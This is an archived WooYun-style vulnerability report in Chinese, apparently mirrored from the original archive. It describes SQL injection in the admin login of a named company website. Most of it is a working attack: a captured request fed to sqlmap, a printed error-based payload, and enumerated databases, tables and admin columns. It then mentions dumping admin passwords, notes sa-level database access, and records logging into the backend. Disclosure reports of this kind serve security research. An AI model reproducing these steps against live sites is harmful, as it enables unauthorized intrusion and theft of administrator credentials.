乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-20: 厂商已经主动忽略漏洞,细节向公众公开
在后台登录窗口(http://www.tlqh.com.cn/manager/Login.aspx)处用burp抓一下包,保存一下放入sql里面跑。
1、看一下都有哪些数据库:
Parameter: txtname (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTUwOTQ0NDQ3MWRkG4evLtrTgC3zhxkpHqYKHwmg4AA=&__VIEWSTATEGENERATOR=6942E586&__EVENTVALIDATION=/wEWBAL1uKqqAgLEhISACwKd+7q4BwKp8pn0BZ2S3vC+NXfN7AJV6RSr9xcmsIso&txtname=admin' AND 3221=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3221=3221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(106)+CHAR(113)))-- SziJ&txtpwd=123456&tijiao=-----------web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
available databases [7]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] tonglianQH
2、当前库是tonglianQH,看一下该库中的表:
Database: tonglianQH[20 tables]+------------------+| B_Admin || B_Keyword || B_PageMenu || B_PagePower || B_RolePower || B_RolePower || B_SEOInfo || ShaoMiaoType || Web_AboutMenu || Web_Case || Web_CaseType || Web_IndexImg || Web_Job || Web_MenuPage || Web_Message || Web_News || Web_NewsType || Web_ShaoMiaoCase || Web_YRZZImg || web_link |+------------------+
3、再看一下这个B_Admin表中的字段:
Database: tonglianQHTable: B_Admin[11 columns]+---------------+----------+| Column | Type |+---------------+----------+| AID | int || CDate | datetime || ISDelete | int || ISLock | int || LastLoginDate | datetime || LastLoginIP | varchar || LoginName | varchar || LoginTime | int || Name | varchar || Password | varchar || RID | int |+---------------+----------+
4、看一下Name,LoginName,Password字段的内容:(还是截个图吧,不然我不好打码~~~)
5、顺便提一下,数据库用户是sa,权限挺高的:
6、用这信息在后台登录一下管理员用户:(后台:http://www.tlqh.com.cn/manager/Login.aspx)
过滤一下参数;而且后台的密码也挺弱的。
未能联系到厂商或者厂商积极拒绝